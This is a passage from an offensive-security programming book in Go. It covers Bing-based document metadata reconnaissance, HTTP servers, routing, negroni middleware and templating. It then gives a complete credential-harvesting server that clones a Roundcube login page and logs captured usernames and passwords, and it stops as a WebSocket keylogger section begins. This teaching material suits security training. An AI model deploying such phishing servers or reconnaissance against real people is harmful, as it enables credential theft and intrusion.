and retrieve files by using Bing. Here’s the plan of action you should follow: 1. Submit a search request to Bing with proper filters to retrieve targeted results. 2. Scrape the HTML response, extracting the HREF (link) data to obtain direct URLs for documents. 3. Submit an HTTP request for each direct document URL 4. Parse the response body to create a zip.Reader. 5. Pass the zip.Reader into the code you already developed to extract metadata. The following sections discuss each of these steps in order. The first order of business is to build a search query template. Much like Google, Bing contains advanced query parameters that you can use to filter search results on numerous variables. Most of these filters are submitted in a filter_type: value format. Without explaining all the available filter types, let’s instead focus on what helps you achieve your goal. The following list contains the three filters you’ll need. Note that you could use additional filters, but at the time of this writing, they behave somewhat unpredictably. site Used to filter the results to a specific domain filetype Used to filter the results based off resource file type instreamset Used to filter the results to include only certain file extensions An example query to retrieve docx files from nytimes.com would look like this: site:nytimes.com && filetype:docx && instreamset:(url title):docx 前沿信安资讯阵地 公众号:i nf osrc 74 Chapter 3 After submitting that query, take a peek at the resulting URL in your browser. It should resemble Figure 3-1. Additional parameters may appear after this, but they’re inconsequential for this example, so you can ignore them. Now that you know the URL and parameter format, you can see the HTML response, but first you need to determine where in the Document Object Model (DOM) the document links reside. You can do this by viewing the source code directly, or limit the guesswork and just use your browser’s developer tools. The following image shows the full HTML element path to the desired HREF. You can use the element inspector, as in Figure 3-1, to quickly select the link to reveal its full path. Figure 3-1: A browser developer tool showing the full element path With that path information, you can use goquery to systematically pull all data elements that match an HTML path. Enough talk! Listing 3-22 puts it all together: retrieving, scraping, parsing, and extracting. Save this code to main.go. u func handler(i int, s *goquery.Selection) { url, ok := s.Find("a").Attr("href")v if !ok { return } fmt.Printf("%d: %s\n", i, url) res, err := http.Get(url)w if err != nil { return } 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 75 buf, err := ioutil.ReadAll(res.Body)x if err != nil { return } defer res.Body.Close() r, err := zip.NewReader(bytes.NewReader(buf)y, int64(len(buf))) if err != nil { return } cp, ap, err := metadata.NewProperties(r)z if err != nil { return } log.Printf( "%25s %25s - %s %s\n", cp.Creator, cp.LastModifiedBy, ap.Application, ap.GetMajorVersion()) } func main() { if len(os.Args) != 3 { log.Fatalln("Missing required argument. Usage: main.go domain ext") } domain := os.Args[1] filetype := os.Args[2] { q := fmt.Sprintf( "site:%s && filetype:%s && instreamset:(url title):%s", domain, filetype, filetype) | search := fmt.Sprintf("http://www.bing.com/search?q=%s", url.QueryEscape(q)) doc, err := goquery.NewDocument(search)} if err != nil { log.Panicln(err) } s := "html body div#b_content ol#b_results li.b_algo div.b_title h2" ~ doc.Find(s).Each(handler) } Listing 3-22: Scraping Bing results and parsing document metadata (/ch-3/bing-metadata /client/main.go) You create two functions. The first, handler(), accepts a goquery.Selection instance u (in this case, it will be populated with an anchor HTML element) and finds and extracts the href attribute v. This attribute contains a direct link to the document returned from the Bing search. Using that URL, the code then issues a GET request to retrieve the document w. Assuming no 前沿信安资讯阵地 公众号:i nf osrc 76 Chapter 3 errors occur, you then read the response body x, leveraging it to create a zip.Reader y. Recall that the function you created earlier in your metadata package, NewProperties(), expects a zip.Reader. Now that you have the appro- priate data type, pass it to that function z, and properties are populated from the file and printed to your screen. The main() function bootstraps and controls the whole process; you pass it the domain and file type as command line arguments. The func- tion then uses this input data to build the Bing query with the appropri- ate filters {. The filter string is encoded and used to build the full Bing search URL |. The search request is sent using the goquery.NewDocument() function, which implicitly makes an HTTP GET request and returns a goquery-friendly representation of the HTML response document }. This document can be inspected with goquery. Finally, use the HTML element selector string you identified with your browser developer tools to find and iterate over matching HTML elements ~. For each matching element, a call is made to your handler() function. A sample run of the code produces output similar to the following: $ go run main.go nytimes.com docx 0: http://graphics8.nytimes.com/packages/pdf/2012NAIHSAnnualHIVReport041713.docx 2020/12/21 11:53:50 Jonathan V. Iralu Dan Frosch - Microsoft Macintosh Word 2010 1: http://www.nytimes.com/packages/pdf/business/Announcement.docx 2020/12/21 11:53:51 agouser agouser - Microsoft Office Outlook 2007 2: http://www.nytimes.com/packages/pdf/business/DOCXIndictment.docx 2020/12/21 11:53:51 AGO Gonder, Nanci - Microsoft Office Word 2007 3: http://www.nytimes.com/packages/pdf/business/BrownIndictment.docx 2020/12/21 11:53:51 AGO Gonder, Nanci - Microsoft Office Word 2007 4: http://graphics8.nytimes.com/packages/pdf/health/Introduction.docx 2020/12/21 11:53:51 Oberg, Amanda M Karen Barrow - Microsoft Macintosh Word 2010 You can now search for and extract document metadata for all Open XML files while targeting a specific domain. I encourage you to expand on this example to include logic to navigate multipage Bing search results, to include other file types beyond Open XML, and to enhance the code to concurrently download the identified files. Summary This chapter introduced to you fundamental HTTP concepts in Go, which you used to create usable tools that interacted with remote APIs, as well as to scrape arbitrary HTML data. In the next chapter, you’ll continue with the HTTP theme by learning to create servers rather than clients. 前沿信安资讯阵地 公众号:i nf osrc If you know how to write HTTP servers from scratch, you can create customized logic for social engineering, command-and- control (C2) transports, or APIs and frontends for your own tools, among other things. Luckily, Go has a brilliant standard package—net/http—for building HTTP servers; it’s really all you need to effectively write not only simple servers, but also complex, full-featured web applications. In addition to the standard package, you can leverage third-party pack- ages to speed up development and remove some of the tedious processes, such as pattern matching. These packages will assist you with routing, building middleware, validating requests, and other tasks. In this chapter, you’ll first explore many of the techniques needed to build HTTP servers using simple applications. Then you’ll deploy these techniques to create two social engineering applications—a credential- harvesting server and a keylogging server—and multiplex C2 channels. 4 H T T P SE R V E R S, RO U T ING, A N D M IDDL E WA R E 前沿信安资讯阵地 公众号:i nf osrc 78 Chapter 4 HTTP Server Basics In this section, you’ll explore the net/http package and useful third-party packages by building simple servers, routers, and middleware. We’ll expand on these basics to cover more nefarious examples later in the chapter. Building a Simple Server The code in Listing 4-1 starts a server that handles requests to a single path. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) The server should locate the name URL parameter containing a user’s name and respond with a customized greeting. package main import ( "fmt" "net/http" ) func hello(w http.ResponseWriter, r *http.Request) { fmt.Fprintf(w, "Hello %s\n", r.URL.Query().Get("name")) } func main() { u http.HandleFunc("/hello", hello) v http.ListenAndServe(":8000", nil) } Listing 4-1: A Hello World server (/ch-4/hello_world /main.go) This simple example exposes a resource at /hello. The resource grabs the parameter and echoes its value back to the client. Within the main() func- tion, http.HandleFunc() u takes two arguments: a string, which is a URL path pattern you’re instructing your server to look for, and a function, which will actually handle the request. You could provide the function definition as an anonymous inline function, if you want. In this example, you pass in the function named hello() that you defined earlier. The hello() function handles requests and returns a hello message to the client. It takes two arguments itself. The first is http.ResponseWriter, which is used to write responses to the request. The second argument is a pointer to http.Request, which will allow you to read information from the incoming request. Note that you aren’t calling your hello() function from main(). You’re simply telling your HTTP server that any requests for /hello should be handled by a function named hello(). Under the covers, what does http.HandleFunc() actually do? The Go doc- umentation will tell you that it places the handler on the DefaultServerMux. A ServerMux is short for a server multiplexer, which is just a fancy way to say that the underlying code can handle multiple HTTP requests for patterns and functions. It does this using goroutines, with one goroutine per incoming 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 79 request. Importing the net/http package creates a ServerMux and attaches it to that package’s namespace; this is the DefaultServerMux. The next line is a call to http.ListenAndServe() v, which takes a string and an http.Handler as arguments. This starts an HTTP server by using the first argument as the address. In this case, that’s :8000, which means the server should listen on port 8000 across all interfaces. For the second argument, the http.Handler, you pass in nil. As a result, the package uses DefaultServerMux as the underlying handler. Soon, you’ll be implementing your own http.Handler and will pass that in, but for now you’ll just use the default. You could also use http.ListenAndServeTLS(), which will start a server using HTTPS and TLS, as the name describes, but requires additional parameters. Implementing the http.Handler interface requires a single method: ServeHTTP(http.ResponseWriter, *http.Request). This is great because it simpli- fies the creation of your own custom HTTP servers. You’ll find numerous third-party implementations that extend the net/http functionality to add features such as middleware, authentication, response encoding, and more. You can test this server by using curl: $ curl -i http://localhost:8000/hello?name=alice HTTP/1.1 200 OK Date: Sun, 12 Jan 2020 01:18:26 GMT Content-Length: 12 Content-Type: text/plain; charset=utf-8 Hello alice Excellent! The server you built reads the name URL parameter and replies with a greeting. Building a Simple Router Next you’ll build a simple router, shown in Listing 4-2, that demonstrates how to dynamically handle inbound requests by inspecting the URL path. Depending on whether the URL contains the path /a, /b, or /c, you’ll print either the message Executing /a, Executing /b, or Executing /c. You’ll print a 404 Not Found error for everything else. package main import ( "fmt" "net/http" ) u type router struct { } v func (r *router) ServeHTTP(w http.ResponseWriter, req *http.Request) { w switch req.URL.Path { case "/a": fmt.Fprint(w, "Executing /a") 前沿信安资讯阵地 公众号:i nf osrc 80 Chapter 4 case "/b": fmt.Fprint(w, "Executing /b") case "/c": fmt.Fprint(w, "Executing /c") default: http.Error(w, "404 Not Found", 404) } } func main() { var r router x http.ListenAndServe(":8000", &r) } Listing 4-2: A simple router (/ch-4/simple_router /main.go) First, you define a new type named router without any fields u. You’ll use this to implement the http.Handler interface. To do this, you must define the ServeHTTP() method v. The method uses a switch statement on the request’s URL path w, executing different logic depending on the path. It uses a default 404 Not Found response action. In main(), you create a new router and pass its respective pointer to http.ListenAndServe() x. Let’s take this for a spin in the ole terminal: $ curl http://localhost:8000/a Executing /a $ curl http://localhost:8000/d 404 Not Found Everything works as expected; the program returns the message Executing /a for a URL that contains the /a path, and it returns a 404 response on a path that doesn’t exist. This is a trivial example. The third-party routers that you’ll use will have much more complex logic, but this should give you a basic idea of how they work. Building Simple Middleware Now let’s build middleware, which is a sort of wrapper that will execute on all incoming requests regardless of the destination function. In the example in Listing 4-3, you’ll create a logger that displays the request’s processing start and stop time. Package main import ( "fmt" "log" "net/http" "time" ) 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 81 u type logger struct { Inner http.Handler } v func (l *logger) ServeHTTP(w http.ResponseWriter, r *http.Request) { log.Println("start") w l.Inner.ServeHTTP(w, r) log.Println("finish") } func hello(w http.ResponseWriter, r *http.Request) { fmt.Fprint(w, "Hello\n") } func main() { x f := http.HandlerFunc(hello) y l := logger{Inner: f} z http.ListenAndServe(":8000", &l) } Listing 4-3: Simple middleware (/ch-4/simple _middleware /main.go) What you’re essentially doing is creating an outer handler that, on every request, logs some information on the server and calls your hello() function. You wrap this logging logic around your function. As with the routing example, you define a new type named logger, but this time you have a field, Inner, which is an http.Handler itself u. In your ServeHTTP() definition v, you use log() to print the start and finish times of the request, calling the inner handler’s ServeHTTP() method in between w. To the client, the request will finish inside the inner handler. Inside main(), you use http.HandlerFunc() to create an http.Handler out of a function x. You create the logger, setting Inner to your newly created handler y. Finally, you start the server by using a pointer to a logger instance z. Running this and issuing a request outputs two messages containing the start and finish times of the request: $ go build -o simple_middleware $ ./simple_middleware 2020/01/16 06:23:14 start 2020/01/16 06:23:14 finish In the following sections, we’ll dig deeper into middleware and routing and use some of our favorite third-party packages, which let you create more dynamic routes and execute middleware inside a chain. We’ll also discuss some use cases for middleware that move into more complex scenarios. Routing with the gorilla/mux Package As shown in Listing 4-2, you can use routing to match a request’s path to a function. But you can also use it to match other properties—such as the HTTP verb or host header—to a function. Several third-party routers are 前沿信安资讯阵地 公众号:i nf osrc 82 Chapter 4 available in the Go ecosystem. Here, we’ll introduce you to one of them: the gorilla/mux package. But just as with everything, we encourage you to expand your knowledge by researching additional packages as you encounter them. The gorilla/mux package is a mature, third-party routing package that allows you to route based on both simple and complex patterns. It includes regular expressions, parameter matching, verb matching, and sub routing, among other features. Let’s go over a few examples of how you might use the router. There is no need to run these, as you’ll be using them in a real program soon, but please feel free to play around and experiment. Before you can use gorilla/mux, you must go get it: $ go get github.com/gorilla/mux Now, you can start routing. Create your router by using mux.NewRouter(): r := mux.NewRouter() The returned type implements http.Handler but has a host of other associated methods as well. The one you’ll use most often is HandleFunc(). For example, if you wanted to define a new route to handle GET requests to the pattern /foo, you could use this: r.HandleFunc("/foo", func(w http.ResponseWriter, req *http.Request) { fmt.Fprint(w, "hi foo") }).Methods("GET")u Now, because of the call to Methods() u, only GET requests will match this route. All other methods will return a 404 response. You can chain other qualifiers on top of this, such as Host(string), which matches a partic- ular host header value. For example, the following will match only requests whose host header is set to www.foo.com: r.HandleFunc("/foo", func(w http.ResponseWriter, req *http.Request) { fmt.Fprint(w, "hi foo") }).Methods("GET").Host("www.foo.com") Sometimes it’s helpful to match and pass in parameters within the request path (for example, when implementing a RESTful API). This is simple with gorilla/mux. The following will print out anything following /users/ in the request’s path: r.HandleFunc("/users/{user}", func(w http.ResponseWriter, req *http.Request) { user := mux.Vars(req)["user"] fmt.Fprintf(w, "hi %s\n", user) }).Methods("GET") 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 83 In the path definition, you use braces to define a request parameter. Think of this as a named placeholder. Then, inside the handler function, you call mux.Vars(), passing it the request object, which returns a map[string] string—a map of request parameter names to their respective values. You provide the named placeholder user as the key. So, a request to /users/bob should produce a greeting for Bob: $ curl http://localhost:8000/users/bob hi bob You can take this a step further and use a regular expression to qualify the patterns passed. For example, you can specify that the user parameter must be lowercase letters: r.HandleFunc("/users/{user:[a-z]+}", func(w http.ResponseWriter, req *http.Request) { user := mux.Vars(req)["user"] fmt.Fprintf(w, "hi %s\n", user) }).Methods("GET") Any requests that don’t match this pattern will now return a 404 response: $ curl -i http://localhost:8000/users/bob1 HTTP/1.1 404 Not Found In the next section, we’ll expand on routing to include some middle- ware implementations using other libraries. This will give you increased flexibility with handling HTTP requests. Building Middleware with Negroni The simple middleware we showed earlier logged the start and end times of the handling of the request and returned the response. Middleware doesn’t have to operate on every incoming request, but most of the time that will be the case. There are many reasons to use middleware, including logging requests, authenticating and authorizing users, and mapping resources. For example, you could write middleware for performing basic authenti- cation. It could parse an authorization header for each request, validate the username and password provided, and return a 401 response if the creden- tials are invalid. You could also chain multiple middleware functions together in such a way that after one is executed, the next one defined is run. For the logging middleware you created earlier in this chapter, you wrapped only a single function. In practice, this is not very useful, because you’ll want to use more than one, and to do this, you must have logic that can execute them in a chain, one after another. Writing this from scratch is not incredibly difficult, but let’s not re-create the wheel. Here, you’ll use a mature package that is already able to do this: negroni. The negroni package, which you can find at https://github.com/urfave /negroni/, is great because it doesn’t tie you into a larger framework. You can easily bolt it onto other frameworks, and it provides a lot of flexibility. 前沿信安资讯阵地 公众号:i nf osrc 84 Chapter 4 It also comes with default middleware that is useful for many applications. Before you hop in, you need to go get negroni: $ go get github.com/urfave/negroni While you technically could use negroni for all application logic, doing this is far from ideal because it’s purpose-built to act as middleware and doesn’t include a router. Instead, it’s best to use negroni in combination with another package, such as gorilla/mux or net/http. Let’s use gorilla/mux to build a program that will get you acquainted with negroni and allow you to visualize the order of operations as they traverse the middleware chain. Start by creating a new file called main.go within a directory namespace, such as github.com/blackhat-go/bhg/ch-4/negroni _example/. (This namespace will already be created in the event you cloned the BHG Github repository.) Now modify your main.go file to include the following code. package main import ( "net/http" "github.com/gorilla/mux" "github.com/urfave/negroni" ) func main() { u r := mux.NewRouter() v n := negroni.Classic() w n.UseHandler(r) http.ListenAndServe(":8000", n) } Listing 4-4: Negroni example (/ch-4/negroni _example /main.go) First, you create a router as you did earlier in this chapter by calling mux.NewRouter() u. Next comes your first interaction with the negroni pack- age: you make a call to negroni.Classic() v. This creates a new pointer to a Negroni instance. There are different ways to do this. You can either use negroni.Classic() or call negroni.New(). The first, negroni.Classic(), sets up default middleware, including a request logger, recovery middleware that will intercept and recover from panics, and middleware that will serve files from the public folder in the same directory. The negroni.New() function doesn’t create any default middleware. Each type of middleware is available in the negroni package. For example, you can use the recovery package by doing the following: n.Use(negroni.NewRecovery()) 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 85 Next, you add your router to the middleware stack by calling n.Use Handler(r) w. As you continue to plan and build out your middleware, consider the order of execution. For example, you’ll want your authentication- checking middleware to run prior to the handler functions that require authentication. Any middleware mounted before the router will execute prior to your handler functions; any middleware mounted after the router will execute after your handler functions. Order matters. In this case, you haven’t defined any custom middleware, but you will soon. Go ahead and build the server you created in Listing 4-4, and then execute it. Then issue web requests to the server at http://localhost:8000. You should see the negroni logging middleware print information to stdout, as shown next. The output shows the timestamp, response code, processing time, host, and HTTP method: $ go build -s negroni_example $ ./negroni_example [negroni] 2020-01-19T11:49:33-07:00 | 404 | 1.0002ms | localhost:8000 | GET Having default middleware is great and all, but the real power comes when you create your own. With negroni, you can use a few methods to add middleware to the stack. Take a look at the following code. It creates trivial middleware that prints a message and passes execution to the next middleware in the chain: type trivial struct { } func (t *trivial) ServeHTTP(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) { u fmt.Println("Executing trivial middleware") next(w, r) v } This implementation is slightly different from previous examples. Before, you were implementing the http.Handler interface, which expected a ServeHTTP() method that accepted two parameters: http.ResponseWriter and *http.Request. In this new example, instead of the http.Handler interface, you’re implementing the negroni.Handler interface. The slight difference is that the negroni.Handler interface expects you to implement a ServeHTTP() method that accepts not two, but three, parameters: http.ResponseWriter, *http.Request, and http.HandlerFunc u. The http.HandlerFunc parameter represents the next middleware function in the chain. For your purposes, you name it next. You do your processing within ServeHTTP(), and then call next() v, passing it the http.ResponseWriter and *http.Request values you originally received. This effectively transfers execution down the chain. But you still have to tell negroni to use your implementation as part of the middleware chain. You can do this by calling negroni’s Use method and passing an instance of your negroni.Handler implementation to it: n.Use(&trivial{}) 前沿信安资讯阵地 公众号:i nf osrc 86 Chapter 4 Writing your middleware by using this method is convenient because you can easily pass execution to the next middleware. There is one drawback: anything you write must use negroni. For example, if you were writing a mid- dleware package that writes security headers to a response, you would want it to implement http.Handler, so you could use it in other application stacks, since most stacks won’t expect a negroni.Handler. The point is, regardless of your middleware’s purpose, compatibility issues may arise when trying to use negroni middleware in a non-negroni stack, and vice versa. There are two other ways to tell negroni to use your middleware. UseHandler (handler http.Handler), which you’re already familiar with, is the first. The second way is to call UseHandleFunc(handlerFunc func(w http.ResponseWriter, r *http.Request)). The latter is not something you’ll want to use often, since it doesn’t let you forgo execution of the next middleware in the chain. For example, if you were writing middleware to perform authentication, you would want to return a 401 response and stop execution if any credentials or session information were invalid; with this method, there’s no way to do that. Adding Authentication with Negroni Before moving on, let’s modify our example from the previous section to dem- onstrate the use of context, which can easily pass variables between functions. The example in Listing 4-5 uses negroni to add authentication middleware. package main import ( "context" "fmt" "net/http" "github.com/gorilla/mux" "github.com/urfave/negroni" ) type badAuth struct { u Username string Password string } func (b *badAuth) ServeHTTP(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) { v username := r.URL.Query().Get("username") w password := r.URL.Query().Get("password") if username != b.Username || password != b.Password { http.Error(w, "Unauthorized", 401) return x } ctx := context.WithValue(r.Context(), "username", username) y r = r.WithContext(ctx) z next(w, r) } 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 87 func hello(w http.ResponseWriter, r *http.Request) { username := r.Context().Value("username").(string) { fmt.Fprintf(w, "Hi %s\n", username) } func main() { r := mux.NewRouter() r.HandleFunc("/hello", hello).Methods("GET") n := negroni.Classic() n.Use(&badAuth{ Username: "admin", Password: "password", }) n.UseHandler(r) http.ListenAndServe(":8000", n) } Listing 4-5: Using context in handlers (/ch-4/negroni_example/main.go) You’ve added new middleware, badAuth, that is going to simulate authen- tication, purely for demonstration purposes u. This new type has two fields, Username and Password, and implements negroni.Handler, since it defines the three-parameter version of the ServeHTTP() method v we discussed previ- ously. Inside the ServeHTTP() method, you first grab the username and pass- word from the request w, and then compare them to the fields you have. If the username and password are incorrect, execution is stopped, and a 401 response is written to the requester. Notice that you return x before calling next(). This prevents the remainder of the middleware chain from executing. If the credentials are correct, you go through a rather verbose routine of adding the user- name to the request context. You first call context.WithValue() to initialize the context from the request, setting a variable named username on that context y. You then make sure the request uses your new context by call- ing r.WithContext(ctx) z. If you plan on writing web applications with Go, you’ll want to become familiar with this pattern, as you’ll be using it a lot. In the hello() function, you get the username from the request context by using the Context().Value(interface{}) function, which itself returns an interface{}. Because you know it’s a string, you can use a type assertion here {. If you can’t guarantee the type, or you can’t guarantee that the value will exist in the context, use a switch routine for conversion. Build and execute the code from Listing 4-5 and send a few requests to the server. Send some with both correct and incorrect credentials. You should see the following output: $ curl -i http://localhost:8000/hello HTTP/1.1 401 Unauthorized Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Thu, 16 Jan 2020 20:41:20 GMT Content-Length: 13 前沿信安资讯阵地 公众号:i nf osrc 88 Chapter 4 Unauthorized $ curl -i 'http://localhost:8000/hello?username=admin&password=password' HTTP/1.1 200 OK Date: Thu, 16 Jan 2020 20:41:05 GMT Content-Length: 9 Content-Type: text/plain; charset=utf-8 Hi admin Making a request without credentials results in your middleware return- ing a 401 Unauthorized error. Sending the same request with a valid set of credentials produces a super-secret greeting message accessible only to authenticated users. That was an awful lot to digest. Up to this point, your handler functions have solely used fmt.FPrintf() to write your response to the http.Response Writer instance. In the next section, you’ll look at a more dynamic way of returning HTML by using Go’s templating package. Using Templates to Produce HTML Responses Templates allow you to dynamically generate content, including HTML, with variables from Go programs. Many languages have third-party pack- ages that allow you to generate templates. Go has two templating packages, text/template and html/template. In this chapter, you’ll use the HTML pack- age, because it provides the contextual encoding you need. One of the fantastic things about Go’s package is that it’s contextually aware: it will encode your variable differently depending on where the vari- able is placed in the template. For example, if you were to supply a string as a URL to an href attribute, the string would be URL encoded, but the same string would be HTML encoded if it rendered within an HTML element. To create and use templates, you first define your template, which contains a placeholder to denote the dynamic contextual data to render. Its syntax should look familiar to readers who have used Jinja with Python. When you render the template, you pass to it a variable that’ll be used as this context. The variable can be a complex structure with several fields, or it can be a primitive variable. Let’s work through a sample, shown in Listing 4-6, that creates a simple template and populates a placeholder with JavaScript. This is a contrived example that shows how to dynamically populate content returned to the browser. package main import ( "html/template" "os" ) u var x = ` <html> <body> 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 89 v Hello {{.}} </body> </html> ` func main() { w t, err := template.New("hello").Parse(x) if err != nil { panic(err) } x t.Execute(os.Stdout, "<script>alert('world')</script>") } Listing 4-6: HTML templating (/ch-4/template _example /main.go) The first thing you do is create a variable, named x, to store your HTML template u. Here you’re using a string embedded in your code to define your template, but most of the time you’ll want to store your tem- plates as separate files. Notice that the template is nothing more than a simple HTML page. Inside the template, you define placeholders by using the {{variable-name}} convention, where variable-name is the data element within your contextual data that you’ll want to render v. Recall that this can be a struct or another primitive. In this case, you’re using a single period, which tells the package that you want to render the entire context here. Since you’ll be working with a single string, this is fine, but if you had a larger and more complex data structure, such as a struct, you could get only the fields you want by calling past this period. For example, if you passed a struct with a Username field to the template, you could render the field by using {{.Username}}. Next, in your main() function, you create a new template by calling template .New(string) w. Then you call Parse(string) to ensure that the tem- plate is properly formatted and to parse it. Together, these two functions return a new pointer to a Template. While this example uses only a single template, it’s possible to embed templates in other templates. When using multiple templates, it’s impor- tant that you name them in order to be able to call them. Finally, you call Execute(io.Writer, interface{}) x, which processes the template by using the variable passed as the second argument and writes it to the provided io.Writer. For demonstration purposes, you’ll use os.Stdout. The second variable you pass into the Execute() method is the context that’ll be used for rendering the template. Running this produces HTML, and you should notice that the script tags and other nefarious characters that were provided as part of your con- text are properly encoded. Neat-o! $ go build -o template_example $ ./template_example <html> <body> Hello &lt;script&gt;alert(&#39;world&#39;)&lt;/script&gt; 前沿信安资讯阵地 公众号:i nf osrc 90 Chapter 4 </body> </html> We could say a lot more about templates. You can use logical operators with them; you can use them with loops and other control structures. You can call built-in functions, and you can even define and expose arbitrary helper functions to greatly expand the templating capabilities. Double neat-o! We recommend you dive in and research these possibilities. They’re beyond the scope of this book, but are powerful. How about you step away from the basics of creating servers and handling requests and instead focus on something more nefarious. Let’s create a credential harvester! Credential Harvesting One of the staples of social engineering is the credential-harvesting attack. This type of attack captures users’ login information to specific websites by getting them to enter their credentials in a cloned version of the original site. The attack is useful against organizations that expose a single-factor authentication interface to the internet. Once you have a user’s credentials, you can use them to access their account on the actual site. This often leads to an initial breach of the organization’s perimeter network. Go provides a great platform for this type of attack, because it’s quick to stand up new servers, and because it makes it easy to configure routing and to parse user-supplied input. You could add many customizations and features to a credential-harvesting server, but for this example, let’s stick to the basics. To begin, you need to clone a site that has a login form. There are a lot of possibilities here. In practice, you’d probably want to clone a site in use by the target. For this example, though, you’ll clone a Roundcube site. Roundcube is an open source webmail client that’s not used as often as com- mercial software, such as Microsoft Exchange, but will allow us to illustrate the concepts just as well. You’ll use Docker to run Roundcube, because it makes the process easier. You can start a Roundcube server of your own by executing the fol- lowing. If you don’t want to run a Roundcube server, then no worries; the exercise source code has a clone of the site. Still, we’re including this for completeness: $ docker run --rm -it -p robbertkl/roundcube The command starts a Roundcube Docker instance. If you navigate to, you’ll be presented with a login form. Normally, you’d use wget to clone a site and all its requisite files, but Roundcube has JavaScript awesomeness that prevents this from working. Instead, you’ll use Google Chrome to save it. In the exercise folder, you should see a directory structure that looks like Listing 4-7. 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 91 $ tree . +-- main.go +-- public +-- index.html +-- index_files +-- app.js +-- common.js +-- jquery-ui-1.10.4.custom.css +-- jquery-ui-1.10.4.custom.min.js +-- jquery.min.js +-- jstz.min.js +-- roundcube_logo.png +-- styles.css +-- ui.js index.html Listing 4-7: Directory listing for /ch-4/credential _harvester/ The files in the public directory represent the unaltered cloned login site. You’ll need to modify the original login form to redirect the entered credentials, sending them to yourself instead of the legitimate server. To begin, open public/index.html and find the form element used to POST the login request. It should look something like the following: <form name="form" method="post" action=""> You need to modify the action attribute of this tag and point it to your server. Change action to /login. Don’t forget to save it. The line should now look like the following: <form name="form" method="post" action="/login"> To render the login form correctly and capture a username and password, you’ll first need to serve the files in the public directory. Then you’ll need to write a HandleFunc for /login to capture the username and password. You’ll also want to store the captured credentials in a file with some verbose logging. You can handle all of this in just a few dozen lines of code. Listing 4-8 shows the program in its entirety. package main import ( "net/http" "os" "time" log "github.com/Sirupsen/logrus" u "github.com/gorilla/mux" ) 前沿信安资讯阵地 公众号:i nf osrc 92 Chapter 4 func login(w http.ResponseWriter, r *http.Request) { log.WithFields(log.Fields{ v "time": time.Now().String(), "username": r.FormValue("_user"), w "password": r.FormValue("_pass"), x "user-agent": r.UserAgent(), "ip_address": r.RemoteAddr, }).Info("login attempt") http.Redirect(w, r, "/", 302) } func main() { fh, err := os.OpenFile("credentials.txt", os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0600) y if err != nil { panic(err) } defer fh.Close() log.SetOutput(fh) z r := mux.NewRouter() r.HandleFunc("/login", login).Methods("POST") { r.PathPrefix("/").Handler(http.FileServer(http.Dir("public"))) | log.Fatal(http.ListenAndServe(":8080", r)) } Listing 4-8: Credential-harvesting server (/ch-4/credential_harvester/main.go) The first thing worth noting is you import github.com/Sirupsen/logrus u. This is a structured logging package that we prefer to use instead of the standard Go log package. It provides more configurable logging options for better error handling. To use this package, you’ll need to make sure you ran go get beforehand. Next, you define the login() handler function. Hopefully, this pattern looks familiar. Inside this function, you use log.WithFields() to write out your captured data v. You display the current time, the user-agent, and IP address of the requester. You also call FormValue(string) to capture both the username (_user) w and password (_pass) x values that were submitted. You get these values from index.html and by locating the form input elements for each username and password. Your server needs to explicitly align with the names of the fields as they exist in the login form. The following snippet, extracted from index.html, shows the relevant input items, with the element names in bold for clarity: <td class="input"><input name="_user" id="rcmloginuser" required="required" size="40" autocapitalize="off" autocomplete="off" type="text"></td> <td class="input"><input name="_pass" id="rcmloginpwd" required="required" size="40" autocapitalize="off" autocomplete="off" type="password"></td> In your main() function, you begin by opening a file that’ll be used to store your captured data y. Then, you use log.SetOutput(io.Writer), passing it the file handle you just created, to configure the logging package so that 前沿信安资讯阵地 公众号:i nf osrc HTTP Servers, Routing, and Middleware 93 it’ll write its output to that file z. Next, you create a new router and mount the login() handler function {. Prior to starting the server, you do one more thing that may look unfa- miliar: you tell your router to serve static files from a directory |. That way, your Go server explicitly knows where your static files—images, JavaScript, HTML—live. Go makes this easy, and provides protections against direc- tory traversal attacks. Starting from the inside out, you use http.Dir(string) to define the directory from which you wish to serve the files. The result of this is passed as input to http.FileServer(FileSystem), which creates an http.Handler for your directory. You’ll mount this to your router by using PathPrefix(string). Using / as a path prefix will match any request that hasn’t already found a match. Note that, by default, the handler returned from FileServer does support directory indexing. This could leak some information. It’s possible to disable this, but we won’t cover that here. Finally, as you have before, you start the server. Once you’ve built and executed the code in Listing 4-8, open your web browser and navigate to http://localhost:8080. Try submitting a username and password to the form. Then head back to the terminal, exit the program, and view the credentials.txt file, shown here: $ go build -o credential_harvester $ ./credential_harvester ^C $ cat credentials.txt INFO[0038] login attempt ip_address="" password="p@ssw0rd1!" time="2020-02-13 21:29:37.048572849 -0800 PST" user-agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" username=bob Look at those logs! You can see that you submitted the username of bob and the password of p@ssw0rd1!. Your malicious server successfully handled the form POST request, captured the entered credentials, and saved them to a file for offline viewing. As an attacker, you could then attempt to use these credentials against the target organization and proceed with further compromise. In the next section, you’ll work through a variation of this credential- harvesting technique. Instead of waiting for form submission, you’ll create a keylogger to capture keystrokes in real time. Keylogging with the WebSocket API The WebSocket API (WebSockets), a full duplex protocol, has increased in popularity over the years and many browsers now support it. It provides a way for web application servers and clients to efficiently communicate with each other. Most importantly, it allows the server to send messages to a client without the need for polling. WebSockets are useful for building “real-time” applications, such as chat and games, but you can use them for nefarious purposes as well, 前沿信安资讯阵地 公众号:i nf osrc 94 Chapter 4 such as injecting a keylogger into an application to capture every key a user presses. To begin, imagine you’ve identified an application that is vulnerable to cross-site scripting (a flaw through which a third party can run arbitrary JavaScript in a victim’s browser) or you’ve compromised a web server, allowing you to modify the application source code. Either scenario should let you include a remote JavaScript file. You’ll build the server infrastructure to handle a WebSocket connection from 